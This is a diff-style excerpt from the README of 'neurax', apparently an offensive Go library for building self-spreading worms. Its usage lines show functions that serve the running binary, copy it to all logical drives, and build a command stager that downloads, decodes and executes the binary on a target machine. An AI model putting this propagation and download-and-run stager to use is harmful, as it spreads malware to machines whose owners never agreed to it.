redcode-labs/neurax/README.md

   //Start a server that exposes the current binary in the background go NeuraxServer()

+  //Copy current binary to all logical drives NeuraxDisks()

   //Create a command stager that should be launched on target machine
   //It will download, decode and execute the binary cmd_stager := NeuraxStager()